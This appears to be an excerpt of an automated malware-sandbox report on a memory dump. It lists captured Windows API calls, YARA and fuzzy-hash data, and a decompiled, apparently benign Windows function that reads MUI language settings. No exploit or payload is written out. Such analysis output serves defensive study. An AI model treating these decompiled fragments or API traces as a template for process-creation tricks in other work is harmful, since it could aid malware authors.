                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,000D3AF8), ref: 000EA27D
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.2360758305.00000000000D0000.00000040.00000001.sdmp, Offset: 000D0000, based on PE: false
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: FreeHeap
                                                                                                                                                                                    • String ID: .z`
                                                                                                                                                                                    • API String ID: 3298025750-1441809116
                                                                                                                                                                                    • Opcode ID: 02792b4c712df0df2153b34d7cbcb22b906212c0cc382e22448fb195bfff6f6f
                                                                                                                                                                                    • Instruction ID: 3c9fc349bc5f7f9c58fd268ef059bdc45ff3563ba987ba55e111812d2e35543a
                                                                                                                                                                                    • Opcode Fuzzy Hash: 02792b4c712df0df2153b34d7cbcb22b906212c0cc382e22448fb195bfff6f6f
                                                                                                                                                                                    • Instruction Fuzzy Hash: F601FD726002046FD720EFA9CC46FD77768EF89350F018599F918AB243C632E915CBE0
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,000D3AF8), ref: 000EA27D
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.2360758305.00000000000D0000.00000040.00000001.sdmp, Offset: 000D0000, based on PE: false
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: FreeHeap
                                                                                                                                                                                    • String ID: .z`
                                                                                                                                                                                    • API String ID: 3298025750-1441809116
                                                                                                                                                                                    • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                                                                                                                                                    • Instruction ID: 28ae1ec232807f0debdc57200bd51f51966c8f34c0c1200795b5773ed662c569
                                                                                                                                                                                    • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                                                                                                                                                    • Instruction Fuzzy Hash: C8E012B1200208ABDB18EF99CC49EA777ADAF88750F018558BA186B242D630F9108AB0
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • CreateProcessInternalW.KERNEL32(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 000EA314
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.2360758305.00000000000D0000.00000040.00000001.sdmp, Offset: 000D0000, based on PE: false
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CreateInternalProcess
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2186235152-0
                                                                                                                                                                                    • Opcode ID: 554272b6323bab9c13ddef2285bac57dbe490d7d781601ebbc2b8bbe096ebe15
                                                                                                                                                                                    • Instruction ID: 29788b85b7940d872217c2b834d81b479089fd2f7265ba26e772cb331ef9ce15
                                                                                                                                                                                    • Opcode Fuzzy Hash: 554272b6323bab9c13ddef2285bac57dbe490d7d781601ebbc2b8bbe096ebe15
                                                                                                                                                                                    • Instruction Fuzzy Hash: 890148B2204108AFDB15CF99DC80DE7B7ADEF8C350F158259FA4C9B242D631E811CBA0
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • CreateProcessInternalW.KERNEL32(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 000EA314
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.2360758305.00000000000D0000.00000040.00000001.sdmp, Offset: 000D0000, based on PE: false
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CreateInternalProcess
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2186235152-0
                                                                                                                                                                                    • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                                                                                                                                                    • Instruction ID: 2c837ef5c34691cfc8d07aad8eb9cfd68800503d3dd5d4fd5c627b732d6282af
                                                                                                                                                                                    • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                                                                                                                                                    • Instruction Fuzzy Hash: 8801AFB2210108AFCB54DF89DC80EEB77ADAF8C754F158258BA0DA7241D630E851CBA4
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,?,000DF1B2,000DF1B2,?,00000000,?,?), ref: 000EA3E0
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.2360758305.00000000000D0000.00000040.00000001.sdmp, Offset: 000D0000, based on PE: false
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: LookupPrivilegeValue
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3899507212-0
                                                                                                                                                                                    • Opcode ID: e3dc86cd774568b1dc24eec7385c1316f4027c764e5523b1e8389aff19de7977
                                                                                                                                                                                    • Instruction ID: 02fcb33fc735f0fcd23bb4d16159abab9104c1fee2829d65ba5c3efadf6b731f
                                                                                                                                                                                    • Opcode Fuzzy Hash: e3dc86cd774568b1dc24eec7385c1316f4027c764e5523b1e8389aff19de7977
                                                                                                                                                                                    • Instruction Fuzzy Hash: 39F08CB66102146FDB20EF99CC86EE777ADEF49220F018455F9586B282D630B92586F1
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • RtlAllocateHeap.NTDLL(000E4516,?,000E4C8F,000E4C8F,?,000E4516,?,?,?,?,?,00000000,00000000,?), ref: 000EA23D
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.2360758305.00000000000D0000.00000040.00000001.sdmp, Offset: 000D0000, based on PE: false
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: AllocateHeap
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1279760036-0
                                                                                                                                                                                    • Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                                                                                                                                                    • Instruction ID: 540fcc797c3b8cffeb03587ade4bf5836a469d5707836264f3314a7210621b9b
                                                                                                                                                                                    • Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                                                                                                                                                    • Instruction Fuzzy Hash: 50E012B1200208ABDB14EF99CC41EA777ADAF88650F118558BA186B242C630F9108AB0
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,?,000DF1B2,000DF1B2,?,00000000,?,?), ref: 000EA3E0
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.2360758305.00000000000D0000.00000040.00000001.sdmp, Offset: 000D0000, based on PE: false
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: LookupPrivilegeValue
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3899507212-0
                                                                                                                                                                                    • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                                                                                                                                                    • Instruction ID: 01ab13f3062e8c6e69f7cb8c56c123dfdc84969dfd2c0199cc67113b08176170
                                                                                                                                                                                    • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                                                                                                                                                    • Instruction Fuzzy Hash: 02E01AB16002086BDB10DF49CC85EE777ADAF89650F018154BA0867242DA34F8108BF5
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Non-executed Functions

                                                                                                                                                                                    C-Code - Quality: 94%
                                                                                                                                                                                    			E02678788(signed int __ecx, void* __edx, signed int _a4) {
                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                    				short* _v12;
                                                                                                                                                                                    				void* _v16;
                                                                                                                                                                                    				signed int _v20;
                                                                                                                                                                                    				char _v24;
                                                                                                                                                                                    				signed int _v28;
                                                                                                                                                                                    				signed int _v32;
                                                                                                                                                                                    				char _v36;
                                                                                                                                                                                    				signed int _v40;
                                                                                                                                                                                    				char _v44;
                                                                                                                                                                                    				signed int _v48;
                                                                                                                                                                                    				signed int _v52;
                                                                                                                                                                                    				signed int _v56;
                                                                                                                                                                                    				signed int _v60;
                                                                                                                                                                                    				char _v68;
                                                                                                                                                                                    				void* _t216;
                                                                                                                                                                                    				intOrPtr _t231;
                                                                                                                                                                                    				short* _t235;
                                                                                                                                                                                    				intOrPtr _t257;
                                                                                                                                                                                    				short* _t261;
                                                                                                                                                                                    				intOrPtr _t284;
                                                                                                                                                                                    				intOrPtr _t288;
                                                                                                                                                                                    				void* _t314;
                                                                                                                                                                                    				signed int _t318;
                                                                                                                                                                                    				short* _t319;
                                                                                                                                                                                    				intOrPtr _t321;
                                                                                                                                                                                    				void* _t328;
                                                                                                                                                                                    				void* _t329;
                                                                                                                                                                                    				char* _t332;
                                                                                                                                                                                    				signed int _t333;
                                                                                                                                                                                    				signed int* _t334;
                                                                                                                                                                                    				void* _t335;
                                                                                                                                                                                    				void* _t338;
                                                                                                                                                                                    				void* _t339;
                                                                                                                                                                                    
                                                                                                                                                                                    				_t328 = __edx;
                                                                                                                                                                                    				_t322 = __ecx;
                                                                                                                                                                                    				_t318 = 0;
                                                                                                                                                                                    				_t334 = _a4;
                                                                                                                                                                                    				_v8 = 0;
                                                                                                                                                                                    				_v28 = 0;
                                                                                                                                                                                    				_v48 = 0;
                                                                                                                                                                                    				_v20 = 0;
                                                                                                                                                                                    				_v40 = 0;
                                                                                                                                                                                    				_v32 = 0;
                                                                                                                                                                                    				_v52 = 0;
                                                                                                                                                                                    				if(_t334 == 0) {
                                                                                                                                                                                    					_t329 = 0xc000000d;
                                                                                                                                                                                    					L49:
                                                                                                                                                                                    					_t334[0x11] = _v56;
                                                                                                                                                                                    					 *_t334 =  *_t334 | 0x00000800;
                                                                                                                                                                                    					_t334[0x12] = _v60;
                                                                                                                                                                                    					_t334[0x13] = _v28;
                                                                                                                                                                                    					_t334[0x17] = _v20;
                                                                                                                                                                                    					_t334[0x16] = _v48;
                                                                                                                                                                                    					_t334[0x18] = _v40;
                                                                                                                                                                                    					_t334[0x14] = _v32;
                                                                                                                                                                                    					_t334[0x15] = _v52;
                                                                                                                                                                                    					return _t329;
                                                                                                                                                                                    				}
                                                                                                                                                                                    				_v56 = 0;
                                                                                                                                                                                    				if(E02678460(__ecx, L"WindowsExcludedProcs",  &_v44,  &_v24,  &_v8) >= 0) {
                                                                                                                                                                                    					_v56 = 1;
                                                                                                                                                                                    					if(_v8 != 0) {
                                                                                                                                                                                    						_t207 = E0265E025(__ecx,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
                                                                                                                                                                                    					}
                                                                                                                                                                                    					_push(1);
                                                                                                                                                                                    					_v8 = _t318;
                                                                                                                                                                                    					E0267718A(_t207);
                                                                                                                                                                                    					_t335 = _t335 + 4;
                                                                                                                                                                                    				}
                                                                                                                                                                                    				_v60 = _v60 | 0xffffffff;
                                                                                                                                                                                    				if(E02678460(_t322, L"Kernel-MUI-Number-Allowed",  &_v44,  &_v24,  &_v8) >= 0) {
                                                                                                                                                                                    					_t333 =  *_v8;
                                                                                                                                                                                    					_v60 = _t333;
                                                                                                                                                                                    					_t314 = E0265E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
                                                                                                                                                                                    					_push(_t333);
                                                                                                                                                                                    					_v8 = _t318;
                                                                                                                                                                                    					E0267718A(_t314);
                                                                                                                                                                                    					_t335 = _t335 + 4;
                                                                                                                                                                                    				}
                                                                                                                                                                                    				_t216 = E02678460(_t322, L"Kernel-MUI-Language-Allowed",  &_v44,  &_v24,  &_v8);
                                                                                                                                                                                    				_t332 = ";";
                                                                                                                                                                                    				if(_t216 < 0) {
                                                                                                                                                                                    					L17:
                                                                                                                                                                                    					if(E02678460(_t322, L"Kernel-MUI-Language-Disallowed",  &_v44,  &_v24,  &_v8) < 0) {
                                                                                                                                                                                    						L30:
                                                                                                                                                                                    						if(E02678460(_t322, L"Kernel-MUI-Language-SKU",  &_v44,  &_v24,  &_v8) < 0) {
                                                                                                                                                                                    							L46:
                                                                                                                                                                                    							_t329 = 0;
                                                                                                                                                                                    							L47:
                                                                                                                                                                                    							if(_v8 != _t318) {
                                                                                                                                                                                    								E0265E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
                                                                                                                                                                                    							}
                                                                                                                                                                                    							if(_v28 != _t318) {
                                                                                                                                                                                    								if(_v20 != _t318) {
                                                                                                                                                                                    									E0265E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
                                                                                                                                                                                    									_v20 = _t318;
                                                                                                                                                                                    									_v40 = _t318;
                                                                                                                                                                                    								}
                                                                                                                                                                                    							}
                                                                                                                                                                                    							goto L49;
                                                                                                                                                                                    						}
                                                                                                                                                                                    						_t231 = _v24;
                                                                                                                                                                                    						_t322 = _t231 + 4;
                                                                                                                                                                                    						_push(_t231);
                                                                                                                                                                                    						_v52 = _t322;
                                                                                                                                                                                    						E0267718A(_t231);
                                                                                                                                                                                    						if(_t322 == _t318) {
                                                                                                                                                                                    							_v32 = _t318;
                                                                                                                                                                                    						} else {
                                                                                                                                                                                    							_v32 = E0265E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
                                                                                                                                                                                    						}
                                                                                                                                                                                    						if(_v32 == _t318) {
                                                                                                                                                                                    							_v52 = _t318;
                                                                                                                                                                                    							L58:
                                                                                                                                                                                    							_t329 = 0xc0000017;
                                                                                                                                                                                    							goto L47;
                                                                                                                                                                                    						} else {
                                                                                                                                                                                    							E02652340(_v32, _v8, _v24);
                                                                                                                                                                                    							_v16 = _v32;
                                                                                                                                                                                    							_a4 = _t318;
                                                                                                                                                                                    							_t235 = E0266E679(_v32, _t332);
                                                                                                                                                                                    							while(1) {
                                                                                                                                                                                    								_t319 = _t235;
                                                                                                                                                                                    								if(_t319 == 0) {
                                                                                                                                                                                    									break;
                                                                                                                                                                                    								}
                                                                                                                                                                                    								 *_t319 = 0;
                                                                                                                                                                                    								_t321 = _t319 + 2;
                                                                                                                                                                                    								E0265E2A8(_t322,  &_v68, _v16);
                                                                                                                                                                                    								if(E02675553(_t328,  &_v68,  &_v36) != 0) {
                                                                                                                                                                                    									_a4 = _a4 + 1;
                                                                                                                                                                                    								}
                                                                                                                                                                                    								_v16 = _t321;
                                                                                                                                                                                    								_t235 = E0266E679(_t321, _t332);
                                                                                                                                                                                    								_pop(_t322);
                                                                                                                                                                                    							}
                                                                                                                                                                                    							_t236 = _v16;
                                                                                                                                                                                    							if( *_v16 != _t319) {
                                                                                                                                                                                    								E0265E2A8(_t322,  &_v68, _t236);
                                                                                                                                                                                    								if(E02675553(_t328,  &_v68,  &_v36) != 0) {
                                                                                                                                                                                    									_a4 = _a4 + 1;
                                                                                                                                                                                    								}
                                                                                                                                                                                    							}
                                                                                                                                                                                    							if(_a4 == 0) {
                                                                                                                                                                                    								E0265E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v32);
                                                                                                                                                                                    								_v52 = _v52 & 0x00000000;
                                                                                                                                                                                    								_v32 = _v32 & 0x00000000;
                                                                                                                                                                                    							}
                                                                                                                                                                                    							if(_v8 != 0) {
                                                                                                                                                                                    								E0265E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
                                                                                                                                                                                    							}
                                                                                                                                                                                    							_v8 = _v8 & 0x00000000;
                                                                                                                                                                                    							_t318 = 0;
                                                                                                                                                                                    							goto L46;
                                                                                                                                                                                    						}
                                                                                                                                                                                    					}
                                                                                                                                                                                    					_t257 = _v24;
                                                                                                                                                                                    					_t322 = _t257 + 4;
                                                                                                                                                                                    					_push(_t257);
                                                                                                                                                                                    					_v40 = _t322;
                                                                                                                                                                                    					E0267718A(_t257);
                                                                                                                                                                                    					_t338 = _t335 + 4;
                                                                                                                                                                                    					if(_t322 == _t318) {
                                                                                                                                                                                    						_v20 = _t318;
                                                                                                                                                                                    					} else {
                                                                                                                                                                                    						_v20 = E0265E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
                                                                                                                                                                                    					}
                                                                                                                                                                                    					if(_v20 == _t318) {
                                                                                                                                                                                    						_v40 = _t318;
                                                                                                                                                                                    						goto L58;
                                                                                                                                                                                    					} else {
                                                                                                                                                                                    						E02652340(_v20, _v8, _v24);
                                                                                                                                                                                    						_v16 = _v20;
                                                                                                                                                                                    						_a4 = _t318;
                                                                                                                                                                                    						_t261 = E0266E679(_v20, _t332);
                                                                                                                                                                                    						_t335 = _t338 + 0x14;
                                                                                                                                                                                    						while(1) {
                                                                                                                                                                                    							_v12 = _t261;
                                                                                                                                                                                    							if(_t261 == _t318) {
                                                                                                                                                                                    								break;
                                                                                                                                                                                    							}
                                                                                                                                                                                    							_v12 = _v12 + 2;
                                                                                                                                                                                    							 *_v12 = 0;
                                                                                                                                                                                    							E0265E2A8(_v12,  &_v68, _v16);
                                                                                                                                                                                    							if(E02675553(_t328,  &_v68,  &_v36) != 0) {
                                                                                                                                                                                    								_a4 = _a4 + 1;
                                                                                                                                                                                    							}
                                                                                                                                                                                    							_v16 = _v12;
                                                                                                                                                                                    							_t261 = E0266E679(_v12, _t332);
                                                                                                                                                                                    							_pop(_t322);
                                                                                                                                                                                    						}
                                                                                                                                                                                    						_t269 = _v16;
                                                                                                                                                                                    						if( *_v16 != _t318) {
                                                                                                                                                                                    							E0265E2A8(_t322,  &_v68, _t269);
                                                                                                                                                                                    							if(E02675553(_t328,  &_v68,  &_v36) != 0) {
                                                                                                                                                                                    								_a4 = _a4 + 1;
                                                                                                                                                                                    							}
                                                                                                                                                                                    						}
                                                                                                                                                                                    						if(_a4 == _t318) {
                                                                                                                                                                                    							E0265E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
                                                                                                                                                                                    							_v40 = _t318;
                                                                                                                                                                                    							_v20 = _t318;
                                                                                                                                                                                    						}
                                                                                                                                                                                    						if(_v8 != _t318) {
                                                                                                                                                                                    							E0265E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
                                                                                                                                                                                    						}
                                                                                                                                                                                    						_v8 = _t318;
                                                                                                                                                                                    						goto L30;
                                                                                                                                                                                    					}
                                                                                                                                                                                    				}
                                                                                                                                                                                    				_t284 = _v24;
                                                                                                                                                                                    				_t322 = _t284 + 4;
                                                                                                                                                                                    				_push(_t284);
                                                                                                                                                                                    				_v48 = _t322;
                                                                                                                                                                                    				E0267718A(_t284);
                                                                                                                                                                                    				_t339 = _t335 + 4;
                                                                                                                                                                                    				if(_t322 == _t318) {
                                                                                                                                                                                    					_v28 = _t318;
                                                                                                                                                                                    				} else {
                                                                                                                                                                                    					_v28 = E0265E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
                                                                                                                                                                                    				}
                                                                                                                                                                                    				if(_v28 == _t318) {
                                                                                                                                                                                    					_v48 = _t318;
                                                                                                                                                                                    					goto L58;
                                                                                                                                                                                    				} else {
                                                                                                                                                                                    					E02652340(_v28, _v8, _v24);
                                                                                                                                                                                    					_v16 = _v28;
                                                                                                                                                                                    					_a4 = _t318;
                                                                                                                                                                                    					_t288 = E0266E679(_v28, _t332);
                                                                                                                                                                                    					_t335 = _t339 + 0x14;
                                                                                                                                                                                    					while(1) {
                                                                                                                                                                                    						_v12 = _t288;
                                                                                                                                                                                    						if(_t288 == _t318) {
                                                                                                                                                                                    							break;
                                                                                                                                                                                    						}
                                                                                                                                                                                    						_v12 = _v12 + 2;
                                                                                                                                                                                    						 *_v12 = 0;
                                                                                                                                                                                    						E0265E2A8(_v12,  &_v68, _v16);
                                                                                                                                                                                    						if(E02675553(_t328,  &_v68,  &_v36) != 0) {
                                                                                                                                                                                    							_a4 = _a4 + 1;
                                                                                                                                                                                    						}
                                                                                                                                                                                    						_v16 = _v12;
                                                                                                                                                                                    						_t288 = E0266E679(_v12, _t332);
                                                                                                                                                                                    						_pop(_t322);
                                                                                                                                                                                    					}
                                                                                                                                                                                    					_t296 = _v16;
                                                                                                                                                                                    					if( *_v16 != _t318) {
                                                                                                                                                                                    						E0265E2A8(_t322,  &_v68, _t296);
                                                                                                                                                                                    						if(E02675553(_t328,  &_v68,  &_v36) != 0) {
                                                                                                                                                                                    							_a4 = _a4 + 1;
                                                                                                                                                                                    						}
                                                                                                                                                                                    					}
                                                                                                                                                                                    					if(_a4 == _t318) {
                                                                                                                                                                                    						E0265E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v28);
                                                                                                                                                                                    						_v48 = _t318;
                                                                                                                                                                                    						_v28 = _t318;
                                                                                                                                                                                    					}
                                                                                                                                                                                    					if(_v8 != _t318) {
                                                                                                                                                                                    						E0265E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
                                                                                                                                                                                    					}
                                                                                                                                                                                    					_v8 = _t318;
                                                                                                                                                                                    					goto L17;
                                                                                                                                                                                    				}
                                                                                                                                                                                    			}





































                                                                                                                                                                                    0x02678788
                                                                                                                                                                                    0x02678788
                                                                                                                                                                                    0x02678791
                                                                                                                                                                                    0x02678794
                                                                                                                                                                                    0x02678798
                                                                                                                                                                                    0x0267879b
                                                                                                                                                                                    0x0267879e
                                                                                                                                                                                    0x026787a1
                                                                                                                                                                                    0x026787a4
                                                                                                                                                                                    0x026787a7
                                                                                                                                                                                    0x026787aa
                                                                                                                                                                                    0x026787af
                                                                                                                                                                                    0x026c1ad3
                                                                                                                                                                                    0x02678b0a
                                                                                                                                                                                    0x02678b0d
                                                                                                                                                                                    0x02678b13
                                                                                                                                                                                    0x02678b19
                                                                                                                                                                                    0x02678b1f
                                                                                                                                                                                    0x02678b25
                                                                                                                                                                                    0x02678b2b
                                                                                                                                                                                    0x02678b31
                                                                                                                                                                                    0x02678b37
                                                                                                                                                                                    0x02678b3d
                                                                                                                                                                                    0x02678b46
                                                                                                                                                                                    0x02678b46
                                                                                                                                                                                    0x026787c6
                                                                                                                                                                                    0x026787d0
                                                                                                                                                                                    0x026c1ae0
                                                                                                                                                                                    0x026c1ae6
                                                                                                                                                                                    0x026c1af8
                                                                                                                                                                                    0x026c1af8
                                                                                                                                                                                    0x026c1afd
                                                                                                                                                                                    0x026c1afe
                                                                                                                                                                                    0x026c1b01
                                                                                                                                                                                    0x026c1b06
                                                                                                                                                                                    0x026c1b06
                                                                                                                                                                                    0x026787d6
                                                                                                                                                                                    0x026787f2
                                                                                                                                                                                    0x026787f7
                                                                                                                                                                                    0x02678807
                                                                                                                                                                                    0x0267880a
                                                                                                                                                                                    0x0267880f
                                                                                                                                                                                    0x02678810
                                                                                                                                                                                    0x02678813
                                                                                                                                                                                    0x02678818
                                                                                                                                                                                    0x02678818
                                                                                                                                                                                    0x0267882c
                                                                                                                                                                                    0x02678831
                                                                                                                                                                                    0x02678838
                                                                                                                                                                                    0x02678908
                                                                                                                                                                                    0x02678920
                                                                                                                                                                                    0x026789f0
                                                                                                                                                                                    0x02678a08
                                                                                                                                                                                    0x02678af6
                                                                                                                                                                                    0x02678af6
                                                                                                                                                                                    0x02678af8
                                                                                                                                                                                    0x02678afb
                                                                                                                                                                                    0x026c1beb
                                                                                                                                                                                    0x026c1beb
                                                                                                                                                                                    0x02678b04
                                                                                                                                                                                    0x026c1bf8
                                                                                                                                                                                    0x026c1c0e
                                                                                                                                                                                    0x026c1c13
                                                                                                                                                                                    0x026c1c16
                                                                                                                                                                                    0x026c1c16
                                                                                                                                                                                    0x026c1bf8
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x02678b04
                                                                                                                                                                                    0x02678a0e
                                                                                                                                                                                    0x02678a11
                                                                                                                                                                                    0x02678a14
                                                                                                                                                                                    0x02678a15
                                                                                                                                                                                    0x02678a18
                                                                                                                                                                                    0x02678a22
                                                                                                                                                                                    0x02678b59
                                                                                                                                                                                    0x02678a28
                                                                                                                                                                                    0x02678a3c
                                                                                                                                                                                    0x02678a3c
                                                                                                                                                                                    0x02678a42
                                                                                                                                                                                    0x026c1bb0
                                                                                                                                                                                    0x026c1b11
                                                                                                                                                                                    0x026c1b11
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x02678a48
                                                                                                                                                                                    0x02678a51
                                                                                                                                                                                    0x02678a5b
                                                                                                                                                                                    0x02678a5e
                                                                                                                                                                                    0x02678a61
                                                                                                                                                                                    0x02678a69
                                                                                                                                                                                    0x02678a69
                                                                                                                                                                                    0x02678a6d
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x02678a74
                                                                                                                                                                                    0x02678a7c
                                                                                                                                                                                    0x02678a7d
                                                                                                                                                                                    0x02678a91
                                                                                                                                                                                    0x02678a93
                                                                                                                                                                                    0x02678a93
                                                                                                                                                                                    0x02678a98
                                                                                                                                                                                    0x02678a9b
                                                                                                                                                                                    0x02678aa1
                                                                                                                                                                                    0x02678aa1
                                                                                                                                                                                    0x02678aa4
                                                                                                                                                                                    0x02678aaa
                                                                                                                                                                                    0x02678ab1
                                                                                                                                                                                    0x02678ac5
                                                                                                                                                                                    0x02678ac7
                                                                                                                                                                                    0x02678ac7
                                                                                                                                                                                    0x02678ac5
                                                                                                                                                                                    0x02678ace
                                                                                                                                                                                    0x026c1bc9
                                                                                                                                                                                    0x026c1bce
                                                                                                                                                                                    0x026c1bd2
                                                                                                                                                                                    0x026c1bd2
                                                                                                                                                                                    0x02678ad8
                                                                                                                                                                                    0x02678aeb
                                                                                                                                                                                    0x02678aeb
                                                                                                                                                                                    0x02678af0
                                                                                                                                                                                    0x02678af4
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x02678af4
                                                                                                                                                                                    0x02678a42
                                                                                                                                                                                    0x02678926
                                                                                                                                                                                    0x02678929
                                                                                                                                                                                    0x0267892c
                                                                                                                                                                                    0x0267892d
                                                                                                                                                                                    0x02678930
                                                                                                                                                                                    0x02678935
                                                                                                                                                                                    0x0267893a
                                                                                                                                                                                    0x02678b51
                                                                                                                                                                                    0x02678940
                                                                                                                                                                                    0x02678954
                                                                                                                                                                                    0x02678954
                                                                                                                                                                                    0x0267895a
                                                                                                                                                                                    0x026c1b63
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x02678960
                                                                                                                                                                                    0x02678969
                                                                                                                                                                                    0x02678973
                                                                                                                                                                                    0x02678976
                                                                                                                                                                                    0x02678979
                                                                                                                                                                                    0x0267897e
                                                                                                                                                                                    0x02678981
                                                                                                                                                                                    0x02678981
                                                                                                                                                                                    0x02678986
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x026c1b6e
                                                                                                                                                                                    0x026c1b74
                                                                                                                                                                                    0x026c1b7b
                                                                                                                                                                                    0x026c1b8f
                                                                                                                                                                                    0x026c1b91
                                                                                                                                                                                    0x026c1b91
                                                                                                                                                                                    0x026c1b99
                                                                                                                                                                                    0x026c1b9c
                                                                                                                                                                                    0x026c1ba2
                                                                                                                                                                                    0x026c1ba2
                                                                                                                                                                                    0x0267898c
                                                                                                                                                                                    0x02678992
                                                                                                                                                                                    0x02678999
                                                                                                                                                                                    0x026789ad
                                                                                                                                                                                    0x026c1ba8
                                                                                                                                                                                    0x026c1ba8
                                                                                                                                                                                    0x026789ad
                                                                                                                                                                                    0x026789b6
                                                                                                                                                                                    0x026789c8
                                                                                                                                                                                    0x026789cd
                                                                                                                                                                                    0x026789d0
                                                                                                                                                                                    0x026789d0
                                                                                                                                                                                    0x026789d6
                                                                                                                                                                                    0x026789e8
                                                                                                                                                                                    0x026789e8
                                                                                                                                                                                    0x026789ed
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x026789ed
                                                                                                                                                                                    0x0267895a
                                                                                                                                                                                    0x0267883e
                                                                                                                                                                                    0x02678841
                                                                                                                                                                                    0x02678844
                                                                                                                                                                                    0x02678845
                                                                                                                                                                                    0x02678848
                                                                                                                                                                                    0x0267884d
